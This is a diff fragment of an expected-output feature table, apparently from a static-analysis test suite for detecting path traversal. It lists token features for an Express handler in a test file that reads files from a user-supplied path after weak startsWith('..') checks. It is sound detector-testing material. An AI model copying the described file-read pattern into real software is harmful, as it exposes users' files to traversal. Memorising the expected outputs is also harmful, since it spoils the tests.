contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:27 | exceptional return of path.startsWith(".") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:27 | exceptional return of path.startsWith(".") | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:27 | exceptional return of path.startsWith(".") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:27 | exceptional return of path.startsWith(".") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:27 | path.startsWith(".") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:27 | path.startsWith(".") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:27 | path.startsWith(".") | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:27 | path.startsWith(".") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:38:8:38:27 | path.startsWith(".") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:38:13:38:22 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:38:13:38:22 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:38:13:38:22 | startsWith | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:38:13:38:22 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:38:13:38:22 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:38:24:38:26 | "." | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:38:24:38:26 | "." | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:38:24:38:26 | "." | calleeImports | path | @@ -7674,6 +70435,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:38:24:38:26 | "." | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:38:24:38:26 | "." | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:38:24:38:26 | "." | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:39:5:39:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:39:8:39:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:39:8:39:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:39:8:39:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:39:8:39:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:39:8:39:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:39:21:39:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:39:21:39:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:39:21:39:24 | path | calleeImports | fs | @@ -7683,6 +70469,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:39:21:39:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:39:21:39:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:39:21:39:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:41:5:41:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:41:8:41:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:41:8:41:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:41:8:41:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:41:8:41:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:41:8:41:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:41:21:41:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:41:21:41:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:41:21:41:24 | path | calleeImports | fs | @@ -7692,6 +70503,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:41:21:41:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:41:21:41:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:41:21:41:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:43:7:43:28 | !path.s ... h("..") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:43:7:43:28 | !path.s ... h("..") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:43:7:43:28 | !path.s ... h("..") | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:43:7:43:28 | !path.s ... h("..") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:43:7:43:28 | !path.s ... h("..") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:11 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:11 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:11 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:11 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:22 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:22 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:22 | path.startsWith | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:22 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:22 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:28 | exceptional return of path.st ... h("..") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:28 | exceptional return of path.st ... h("..") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:28 | exceptional return of path.st ... h("..") | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:28 | exceptional return of path.st ... h("..") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:28 | exceptional return of path.st ... h("..") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:28 | path.st ... h("..") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:28 | path.st ... h("..") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:28 | path.st ... h("..") | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:28 | path.st ... h("..") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:43:8:43:28 | path.st ... h("..") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:43:13:43:22 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:43:13:43:22 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:43:13:43:22 | startsWith | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:43:13:43:22 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:43:13:43:22 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:43:24:43:27 | ".." | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:43:24:43:27 | ".." | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:43:24:43:27 | ".." | calleeImports | path | @@ -7701,6 +70542,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:43:24:43:27 | ".." | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:43:24:43:27 | ".." | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:43:24:43:27 | ".." | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:44:5:44:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:44:8:44:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:44:8:44:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:44:8:44:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:44:8:44:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:44:8:44:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:44:21:44:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:44:21:44:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:44:21:44:24 | path | calleeImports | fs | @@ -7710,6 +70576,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:44:21:44:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:44:21:44:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:44:21:44:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:46:7:46:29 | !path.s ... ("../") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:46:7:46:29 | !path.s ... ("../") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:46:7:46:29 | !path.s ... ("../") | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:46:7:46:29 | !path.s ... ("../") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:46:7:46:29 | !path.s ... ("../") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:11 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:11 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:11 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:11 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:22 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:22 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:22 | path.startsWith | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:22 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:22 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:29 | exceptional return of path.st ... ("../") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:29 | exceptional return of path.st ... ("../") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:29 | exceptional return of path.st ... ("../") | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:29 | exceptional return of path.st ... ("../") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:29 | exceptional return of path.st ... ("../") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:29 | path.st ... ("../") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:29 | path.st ... ("../") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:29 | path.st ... ("../") | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:29 | path.st ... ("../") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:46:8:46:29 | path.st ... ("../") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:46:13:46:22 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:46:13:46:22 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:46:13:46:22 | startsWith | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path fs readFileSync path path startsWith . fs readFileSync path fs readFileSync path path startsWith .. fs readFileSync path path startsWith ../ fs readFileSync path path startsWith .. pathModule sep fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:46:13:46:22 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:46:13:46:22 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:46:24:46:28 | "../" | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:46:24:46:28 | "../" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:46:24:46:28 | "../" | calleeImports | path | @@ -7719,6 +70615,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:46:24:46:28 | "../" | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:46:24:46:28 | "../" | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | 